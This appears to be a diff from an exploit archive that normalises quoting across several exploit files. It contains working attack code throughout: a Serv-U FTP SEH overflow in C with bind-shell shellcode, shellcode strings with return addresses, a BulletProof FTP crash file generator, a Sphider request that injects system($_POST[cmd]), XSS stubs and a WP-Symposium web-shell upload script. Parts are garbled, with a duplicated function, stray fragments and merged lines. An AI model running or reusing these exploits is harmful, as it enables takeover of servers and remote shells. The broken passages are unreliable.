-sc += \"\\x23\\x73\\xe4\\x83\\xeb\\xfc\\xe2\\xf4\\x24\\xcb\\x35\\xe4\\xd8\\x23\\xf8\\xa1\"
-sc += \"\\xe4\\xa8\\x0f\\xe1\\xa0\\x22\\x9c\\x6f\\x97\\x3b\\xf8\\xbb\\xf8\\x22\\x98\\x07\"
-sc += \"\\xf6\\x6a\\xf8\\xd0\\x53\\x22\\x9d\\xd5\\x18\\xba\\xdf\\x60\\x18\\x57\\x74\\x25\"
-sc += \"\\x12\\x2e\\x72\\x26\\x33\\xd7\\x48\\xb0\\xfc\\x27\\x06\\x07\\x53\\x7c\\x57\\xe5\"
-sc += \"\\x33\\x45\\xf8\\xe8\\x93\\xa8\\x2c\\xf8\\xd9\\xc8\\xf8\\xf8\\x53\\x22\\x98\\x6d\"
-sc += \"\\x84\\x07\\x77\\x27\\xe9\\xe3\\x17\\x6f\\x98\\x13\\xf6\\x24\\xa0\\x2c\\xf8\\xa4\"
-sc += \"\\xd4\\xa8\\x03\\xf8\\x75\\xa8\\x1b\\xec\\x31\\x28\\x73\\xe4\\xd8\\xa8\\x33\\xd0\"
-sc += \"\\xdd\\x5f\\x73\\xe4\\xd8\\xa8\\x1b\\xd8\\x87\\x12\\x85\\x84\\x8e\\xc8\\x7e\\x8c\"
-sc += \"\\x37\\xed\\x93\\x84\\xb0\\xbb\\x8d\\x6e\\xd6\\x74\\x8c\\x03\\x30\\xcd\\x8c\\x1b\"
-sc += \"\\x27\\x40\\x1e\\x80\\xf6\\x46\\x0b\\x81\\xf8\\x0c\\x10\\xc4\\xb6\\x46\\x07\\xc4\"
-sc += \"\\xad\\x50\\x16\\x96\\xf8\\x7b\\x53\\x94\\xaf\\x47\\x53\\xcb\\x99\\x67\\x37\\xc4\"
-sc += \"\\xfe\\x05\\x53\\x8a\\xbd\\x57\\x53\\x88\\xb7\\x40\\x12\\x88\\xbf\\x51\\x1c\\x91\"
-sc += \"\\xa8\\x03\\x32\\x80\\xb5\\x4a\\x1d\\x8d\\xab\\x57\\x01\\x85\\xac\\x4c\\x01\\x97\"
-sc += \"\\xf8\\x7b\\x53\\xcb\\x99\\x67\\x37\\xe4\";
-sc += \"AA\"
+sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
+sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\xd8\x23\xf8\xa1"
+sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\xf8\x22\x98\x07"
+sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x18\x57\x74\x25"
+sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x53\x7c\x57\xe5"
+sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x53\x22\x98\x6d"
+sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\xa0\x2c\xf8\xa4"
+sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\xd8\xa8\x33\xd0"
+sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x8e\xc8\x7e\x8c"
+sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x30\xcd\x8c\x1b"
+sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\xb6\x46\x07\xc4"
+sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x99\x67\x37\xc4"
+sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\xbf\x51\x1c\x91"
+sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\xac\x4c\x01\x97"
+sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
+sc += "AA"
 # Win2k SP0,1,2,3,4 (US...)
 #Change Return address as needed
-#buf = \"\\xEB\\x19\" + \" /\" + sc + struct.pack(\"<L\",0x750236b2) + \"\\r\\n\\r\\n\"
+#buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"
 
 #0x74FA2AC4		pop esi - pop - ret	ws2help.dll	Win 2K SP4 FR (Found with findjmp2 by Class101 ;)
-#buf = \"\\x90\" * 24 + \" /\" + sc + struct.pack(\"<L\",0x74fa2ac5) + \"\\r\\n\\r\\n\"	#EB becomes CB...? so i changed it by nops
+#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x74fa2ac5) + "\r\n\r\n"	#EB becomes CB...? so i changed it by nops
 
 #Win XP SP2 FR?
 #0x719E260D		pop esi - pop - ret	ws2help.dll	Win XP SP2 FR (Found with findjmp2 by Class101 ;)
-#buf = \"\\x90\" * 24 + \" /\" + sc + struct.pack(\"<L\",0x719e260e) + \"\\r\\n\\r\\n\"	#EB becomes CB...? so i changed it by nops
+#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x719e260e) + "\r\n\r\n"	#EB becomes CB...? so i changed it by nops
 
 
 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-s.connect((\'127.0.0.1\',80))
+s.connect(('127.0.0.1',80))
 s.send(buf)
 s.close()
 
diff --git a/platforms/windows/remote/822.c b/platforms/windows/remote/822.c
index 86fcb28ab..e13e7bc02 100755
--- a/platforms/windows/remote/822.c
+++ b/platforms/windows/remote/822.c
@@ -4,36 +4,36 @@
 #include <netinet/in.h>
 
 #define exploit_length      511
-#define NOP \'A\'
+#define NOP 'A'
 
 #define SEH_handler_offset  400
-char* SEH_handler     = \"\\x41\\x41\\xEB\\x04\"; // 3) jmp over next four bytes
-char* retaddress_4004 = \"\\xab\\x1c\\x5f\\x01\"; // 1) libeay32.015f1cab
-char* retaddress_4100 = \"\\xcb\\x1c\\x41\\x01\"; // 1) ssleay32.01411ccb
-char* retaddress_4103 = \"\\x8b\\x1d\\x41\\x01\"; // 1) ssleay32.01411d8b
+char* SEH_handler     = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
+char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
+char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
+char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
 
 char* shellcode = 
-  \"\\xeb\\x43\\x56\\x57\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\\x52\\x8b\\x52\"
-  \"\\x20\\x01\\xea\\x31\\xc0\\x31\\xc9\\x41\\x8b\\x34\\x8a\\x01\\xee\\x31\\xff\\xc1\"
-  \"\\xcf\\x13\\xac\\x01\\xc7\\x85\\xc0\\x75\\xf6\\x39\\xdf\\x75\\xea\\x5a\\x8b\\x5a\"
-  \"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\"
-  \"\\xe8\\x5f\\x5e\\xff\\xe0\\xfc\\x31\\xc0\\x64\\x8b\\x40\\x30\\x8b\\x40\\x0c\\x8b\"
-  \"\\x70\\x1c\\xad\\x8b\\x68\\x08\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x68\\x33\\x32\"
-  \"\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xbb\\x71\\xa7\\xe8\\xfe\\xe8\\x90\\xff\"
-  \"\\xff\\xff\\x89\\xef\\x89\\xc5\\x81\\xc4\\x70\\xfe\\xff\\xff\\x54\\x31\\xc0\\xfe\"
-  \"\\xc4\\x40\\x50\\xbb\\x22\\x7d\\xab\\x7d\\xe8\\x75\\xff\\xff\\xff\\x31\\xc0\\x50\"
-  \"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xbb\\xa6\\x55\\x34\\x79\\xe8\\x61\\xff\\xff\"
-  \"\\xff\\x89\\xc6\\x31\\xc0\\x50\\x50\\x35\\x02\\x01\\x70\\xcc\\xfe\\xcc\\x50\\x89\"
-  \"\\xe0\\x50\\x6a\\x10\\x50\\x56\\xbb\\x81\\xb4\\x2c\\xbe\\xe8\\x42\\xff\\xff\\xff\"
-  \"\\x31\\xc0\\x50\\x56\\xbb\\xd3\\xfa\\x58\\x9b\\xe8\\x34\\xff\\xff\\xff\\x58\\x6a\"
-  \"\\x10\\x54\\x50\\x56\\xbb\\x47\\xf3\\x56\\xc6\\xe8\\x24\\xff\\xff\\xff\\x31\\xdb\"
-  \"\\x53\\x68\\x2e\\x63\\x6d\\x64\\x89\\xe1\\x41\\x50\\x50\\x50\\x53\\x53\\x31\\xc0\"
-  \"\\xfe\\xc4\\x40\\x50\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x6a\\x44\"
-  \"\\x89\\xe6\\x50\\x55\\x53\\x53\\x53\\x53\\x54\\x56\\x53\\x53\\x53\\x43\\x53\\x4b\"
-  \"\\x53\\x53\\x51\\x53\\x89\\xfd\\xbb\\x21\\xd0\\x05\\xd0\\xe8\\xe2\\xfe\\xff\\xff\"
-  \"\\x31\\xc0\\x48\\x8b\\x44\\x24\\x04\\xbb\\x43\\xcb\\x8d\\x5f\\xe8\\xd1\\xfe\\xff\"
-  \"\\xff\\x5d\\x5d\\x5d\\xbb\\x12\\x6b\\x6d\\xd0\\xe8\\xc4\\xfe\\xff\\xff\\x31\\xc0\"
-  \"\\x50\\x89\\xfd\\xbb\\x69\\x1d\\x42\\x3a\\xe8\\xb5\\xfe\\xff\\xff\";
+  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
+  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
+  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
+  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
+  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
+  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
+  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
+  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
+  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
+  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
+  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
+  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
+  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
+  "\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
+  "\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
+  "\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
+  "\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
+  "\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
+  "\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
+  "\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
+  "\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";
 
 int sock;
 FILE* FILEsock;
@@ -42,12 +42,12 @@ int doubling;
 void send_command(char *command, char *arguments) {
   int i;
   send(sock, command, strlen(command), 0);
-  send(sock, \" \", 1, 0);
+  send(sock, " ", 1, 0);
   for (i=0; i<strlen(arguments); i++) {
     send(sock, arguments+i, 1, 0);
-    if (doubling && arguments[i] == \'\\xff\') send(sock, arguments+i, 1, 0);
+    if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
   }
-  send(sock, \"\\x0a\\x0d\", 2, 0);
+  send(sock, "\x0a\x0d", 2, 0);
 }
 
 int main(int argc, char *argv[], char *envp[]) {
@@ -57,93 +57,93 @@ int main(int argc, char *argv[], char *envp[]) {
   char *version = NULL;
 
   if (argc<5) {
-    printf(\"Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\\n\", argv[0]);
+    printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
     exit(-1);
   }
 
-  printf(\"- Serv-ME ----------------------------------------------------\\n\"
-         \"  Serv-U v4.x \\\"site chmod\\\" exploit.\\n\"
-         \"  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\\n\"
-         \"  Credits for the vulnerability go to ICBM <icbm@0x557.net>.\\n\"
-         \"  Thanks to H D Moore for the shellcode (www.metasploit.com).\\n\"
-         \"  Greets to everyone at 0dd and #netric.\\n\"
-         \"  (K)(L)(F) for Suzan.\\n\"
-         \"\\n\"
-         \"  Binds a shell at %s:28876 if successfull.\\n\"
-         \"  Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\\n\"
-         \"--------------------------------------------------------------\\n\",
+  printf("- Serv-ME ----------------------------------------------------\n"
+         "  Serv-U v4.x \"site chmod\" exploit.\n"
+         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
+         "  Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n"
+         "  Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
+         "  Greets to everyone at 0dd and #netric.\n"
+         "  (K)(L)(F) for Suzan.\n"
+         "\n"
+         "  Binds a shell at %s:28876 if successfull.\n"
+         "  Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
+         "--------------------------------------------------------------\n",
            argv[1]);
 
   addr.sin_family = AF_INET;
   addr.sin_port = htons(atoi(argv[2]));
   addr.sin_addr.s_addr = inet_addr(argv[1]);
 
-  printf(\"\\n[+] Connecting to %s:%s...\\n\", argv[1], argv[2]);
+  printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
   if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
-    perror(\"Socket creation failed\");
+    perror("Socket creation failed");
     exit(-1);
   }
   if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
-    perror(\"Connection failed\");
+    perror("Connection failed");
     exit(-1);
   }
-  FILEsock = fdopen(sock, \"r\");
-  printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
-  if (strstr(inbuffer, \"220 Serv-U FTP Server v4.\") != inbuffer) {
-    printf(\"[-] This is not a Serv-U v4.X ftp server.\\n\");
+  FILEsock = fdopen(sock, "r");
+  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
+  if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
+    printf("[-] This is not a Serv-U v4.X ftp server.\n");
     exit(-1);
   }
-  if (strstr(inbuffer, \"v4.1\") > 0) {
+  if (strstr(inbuffer, "v4.1") > 0) {
     retaddress = retaddress_4103;
-    version = \"4.1.0.3\";
+    version = "4.1.0.3";
   }
 
-  printf(\"\\n[+] Login in as %s:%s...\\n\", argv[3], argv[4]);
-  send_command(\"USER\", argv[3]);
-  printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
-  send_command(\"PASS\", argv[4]);
-  printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
-  if (strstr(inbuffer, \"230\") != inbuffer) {
-    printf(\"[-] Login failed.\\n\");
+  printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
+  send_command("USER", argv[3]);
+  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
+  send_command("PASS", argv[4]);
+  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
+  if (strstr(inbuffer, "230") != inbuffer) {
+    printf("[-] Login failed.\n");
     exit(-1);
   }
 
   if (argv[5]) {
-    printf(\"\\n[+] Changing directory...\\n\");
-    send_command(\"CD\", argv[5]);
-    printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
+    printf("\n[+] Changing directory...\n");
+    send_command("CD", argv[5]);
+    printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
   }
 
   outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
   memset(outbuffer, NOP, exploit_length);
   memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));
 
-  printf(\"\\n[+] Checking if \\\\xff doubling is nescesary: \");
-  send_command(\"SITE CHMOD 477\", \"-\\xff\\xff-\");
+  printf("\n[+] Checking if \\xff doubling is nescesary: ");
+  send_command("SITE CHMOD 477", "-\xff\xff-");
   fgets(inbuffer, sizeof inbuffer, FILEsock);
-  if (strchr(inbuffer, \'\\xff\') == strrchr(inbuffer, \'\\xff\')) {
+  if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
     doubling = 1;
-    printf(\"Yes.\");
+    printf("Yes.");
     retaddress = retaddress_4004;
-    version = \"4.0.0.4\";
+    version = "4.0.0.4";
   } else {
-    printf(\"No.\");
+    printf("No.");
     if (retaddress==NULL) {
       retaddress = retaddress_4100;
-      version = \"4.1.0.0\";
+      version = "4.1.0.0";
     }
   }
-  printf(\"\\n[+] Serv-U FTP server version %s: using retaddress 0x%08x\",
+  printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
                       version, *(int*)retaddress);
   memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
   memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));
 
-  printf(\"\\n[+] Sending exploit... \");
-  send_command(\"SITE CHMOD 477\", outbuffer);
-  printf(\"send, you can now try to connect to %s:28876.\\n\", argv[1]);
-  printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
+  printf("\n[+] Sending exploit... ");
+  send_command("SITE CHMOD 477", outbuffer);
+  printf("send, you can now try to connect to %s:28876.\n", argv[1]);
+  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
   close(socket);
-  printf(\"\\n[+] Done. \\n\");
+  printf("\n[+] Done. \n");
 }
 
 
diff --git a/platforms/windows/remote/9998.c b/platforms/windows/remote/9998.c
index 3bb0800fc..7c3cea9cc 100755
--- a/platforms/windows/remote/9998.c
+++ b/platforms/windows/remote/9998.c
@@ -43,32 +43,32 @@ FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0
 
 char *xpl;
 char *str;
-char message[]=\"This is a BulletProof FTP Client Session-File and should not be modified directly.\\n\";
-char trash[]=\"21\\nanything\\nbpfdhjomeepehepbflql\\nC:\\\\\\n/\";
+char message[]="This is a BulletProof FTP Client Session-File and should not be modified directly.\n";
+char trash[]="21\nanything\nbpfdhjomeepehepbflql\nC:\\\n/";
 
 int main(){
     int tam;
     FILE *fp;
-    printf(\"Made by: Rafael Sousa\\n\");
-    printf(\"Produzido por Rafael Sousa\\n\");
+    printf("Made by: Rafael Sousa\n");
+    printf("Produzido por Rafael Sousa\n");
 
 int main(){
     int tam;
     FILE *fp;
-    printf(\"Made by: Rafael Sousa\\n\");
-    printf(\"Produzido por Rafael Sousa\\n\");
+    printf("Made by: Rafael Sousa\n");
+    printf("Produzido por Rafael Sousa\n");
     str=(char *)malloc(98*sizeof(char));
-    memset(str,\'a\',93);
-    str[93]=\'b\';
-    str[94]=\'c\';
-    str[95]=\'d\';
-    str[96]=\'e\';
-    str[97]=\'\\0\';
+    memset(str,'a',93);
+    str[93]='b';
+    str[94]='c';
+    str[95]='d';
+    str[96]='e';
+    str[97]='\0';
     tam=strlen(str)+strlen(message)+strlen(trash);
-    printf(\"%d\\n\",tam);
+    printf("%d\n",tam);
     xpl=(char *)malloc((tam+1)*sizeof(char));
-    sprintf(xpl,\"%s%s\\n%s\",message,str,trash);
-    fp=fopen(\"POC.bps\",\"w\");
+    sprintf(xpl,"%s%s\n%s",message,str,trash);
+    fp=fopen("POC.bps","w");
     fputs(xpl,fp);
     fclose(fp);
     free(str);
5.5.35-0+wheezy1 +
5.5.35-0+wheezy1 [cid:image001.jpg@01CFAA73.0B6B8330] @@ -24,13 +24,13 @@ Response: # Exploit Title: Sphider 1.3.6 or later PHP Injection Description: -An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of \"conf.php file\". However during the installation the user is advised to change the permissions of \"conf.php\" file to chmod 666. +An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of "conf.php file". However during the installation the user is advised to change the permissions of "conf.php" file to chmod 666. Proof of Concept: Request: POST /admin/admin.php f=settings&Submit=1&_version_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_print_results=1&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100;system($_POST[cmd])&_index_numbers=1&_index_meta_keywords=1&_pdftotext_path=c%3A%5Ctemp%5Cpdftotext.exe&_catdoc_path=c%3A%5Ctemp%5Ccatdoc.exe&_xls2csv_path=c%3A%5Ctemp%5Cxls2csv&_catppt_path=c%3A%5Ctemp%5Ccatppt&_user_agent=Sphider&_min_delay=0&_strip_sessids=1&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_show_meta_description=1&_show_query_scores=1&_show_categories=1&_desc_length=250&_did_you_mean_enabled=1&_suggest_enabled=1&_suggest_history=1&_suggest_rows=10&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5 -\"system($_POST[cmd])\" has been injected. +"system($_POST[cmd])" has been injected. Request: POST http://URL/sphider/settings/conf.php cmd=pwd @@ -49,7 +49,7 @@ Request: POST /admin/admin.php f=7&parent=&category= Response - + @@ -57,10 +57,10 @@ Response Reflected XSS: Request: POST /sphider/admin/admin.php -f=index&adv=1&url=\"/> +f=index&adv=1&url="/> Response: - + diff --git a/platforms/php/webapps/35336.txt b/platforms/php/webapps/35336.txt index e174f5937..a6cae2f1b 100755 --- a/platforms/php/webapps/35336.txt +++ b/platforms/php/webapps/35336.txt @@ -6,26 +6,26 @@ An attacker may leverage these issues to execute arbitrary script code in the br TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. - + - + - + - + - + - + - \' /> + - \' /> + - \' /> + - + -

Exploit!

 +

Exploit!

 diff --git a/platforms/php/webapps/35338.txt b/platforms/php/webapps/35338.txt index 7323791d0..a8b24fee9 100755 --- a/platforms/php/webapps/35338.txt +++ b/platforms/php/webapps/35338.txt @@ -8,7 +8,7 @@ TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. GET /taskfreak/rss.php HTTP/1.1 -Referer: \">Waddup! +Referer: ">Waddup! User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) diff --git a/platforms/php/webapps/35543.txt b/platforms/php/webapps/35543.txt index 9977c97e1..2b887992e 100755 --- a/platforms/php/webapps/35543.txt +++ b/platforms/php/webapps/35543.txt @@ -19,39 +19,39 @@ # # -------------------------------------------------------------------- # -# The upload function located on \"/wp-symposium/server/file_upload_form.php \" is protected: +# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected: # -# if ($_FILES[\"file\"][\"error\"] > 0) { -# echo \"Error: \" . $_FILES[\"file\"][\"error\"] . \"
\"; +# if ($_FILES["file"]["error"] > 0) { +# echo "Error: " . $_FILES["file"]["error"] . "
"; # } else { -# $allowedExts = \',\'.get_option(WPS_OPTIONS_PREFIX.\'_image_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_doc_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_video_ext\'); -# //echo \"Upload: \" . $_FILES[\"file\"][\"name\"] . \"
\"; -# $ext = pathinfo($_FILES[\"file\"][\"name\"], PATHINFO_EXTENSION); -# //echo \"Extension: \" . $ext . \"
\"; +# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext'); +# //echo "Upload: " . $_FILES["file"]["name"] . "
"; +# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION); +# //echo "Extension: " . $ext . "
"; # if (strpos($allowedExts, $ext)) { # $extAllowed = true; # } else { # $extAllowed = false; # } -# //echo \"Type: \" . $_FILES[\"file\"][\"type\"] . \"
\"; -# //echo \"Size: \" . ($_FILES[\"file\"][\"size\"] / 1024) . \" kB
\"; -# //echo \"Stored in: \" . $_FILES[\"file\"][\"tmp_name\"]; +# //echo "Type: " . $_FILES["file"]["type"] . "
"; +# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB
"; +# //echo "Stored in: " . $_FILES["file"]["tmp_name"]; # # if (!$extAllowed) { -# echo __(\'Sorry, file type not allowed.\', WPS_TEXT_DOMAIN); +# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN); # } else { # // Copy file to tmp location # ... # ... # ... # -# BUTTTTT \"/wp-symposium/server/php/index.php\" is not protected and \"/wp-symposium/server/php/UploadHandler.php\" allow any extension +# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension # -# The same vulnerable files are locate in \"/wp-symposium/mobile-files/server/php/\" +# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/" # # --------------------------------------------------------------------- # -# Dork google: index of \"wp-symposium\" +# Dork google: index of "wp-symposium" # # # Tested on BackBox 3.x with python 2.6 @@ -69,8 +69,8 @@ import os, os.path, mimetypes # Check url def checkurl(url): - if url[:8] != \"https://\" and url[:7] != \"http://\": - print(\'[X] You must insert http:// or https:// procotol\') + if url[:8] != "https://" and url[:7] != "http://": + print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url @@ -78,62 +78,62 @@ def checkurl(url): # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): - print \'[X] \'+file+\' file is missing or not readable\' + print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file -# Get file\'s mimetype +# Get file's mimetype def get_content_type(filename): - return mimetypes.guess_type(filename)[0] or \'application/octet-stream\' + return mimetypes.guess_type(filename)[0] or 'application/octet-stream' def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): - return \'\'.join(random.choice(chars) for _ in range(size)) + return ''.join(random.choice(chars) for _ in range(size)) # Create multipart header def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName): getfields = dict() - getfields[\'uploader_uid\'] = \'1\' - getfields[\'uploader_dir\'] = \'./\'+randDirName - getfields[\'uploader_url\'] = url_symposium_upload + getfields['uploader_uid'] = '1' + getfields['uploader_dir'] = './'+randDirName + getfields['uploader_url'] = url_symposium_upload payloadcontent = open(payloadname).read() - LIMIT = \'----------lImIt_of_THE_fIle_eW_$\' - CRLF = \'\\r\\n\' + LIMIT = '----------lImIt_of_THE_fIle_eW_$' + CRLF = '\r\n' L = [] for (key, value) in getfields.items(): - L.append(\'--\' + LIMIT) - L.append(\'Content-Disposition: form-data; name=\"%s\"\' % key) - L.append(\'\') + L.append('--' + LIMIT) + L.append('Content-Disposition: form-data; name="%s"' % key) + L.append('') L.append(value) - L.append(\'--\' + LIMIT) - L.append(\'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\' % (\'files[]\', randShellName+\".php\")) - L.append(\'Content-Type: %s\' % get_content_type(payloadname)) - L.append(\'\') + L.append('--' + LIMIT) + L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php")) + L.append('Content-Type: %s' % get_content_type(payloadname)) + L.append('') L.append(payloadcontent) - L.append(\'--\' + LIMIT + \'--\') - L.append(\'\') + L.append('--' + LIMIT + '--') + L.append('') body = CRLF.join(L) return body -banner = \"\"\" +banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| - |. / \\ |_____|__| |_____| __|__| |_____|_____|_____| + |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | - `--- ---\' + `--- ---' ___ ___ _______ _______ __ | Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------. |. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | | - |. / \\ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__| + |. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__| |: |: | |: 1 |_____| |__| |::.|:. |::.| |::.. . | - `--- ---`---\' `-------\' + `--- ---`---' `-------' Wp-Symposium Sh311 Upl04d Vuln3r4b1l1ty v14.11 @@ -151,17 +151,17 @@ banner = \"\"\" https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww -\"\"\" +""" -commandList = optparse.OptionParser(\'usage: %prog -t URL -f FILENAME.PHP [--timeout 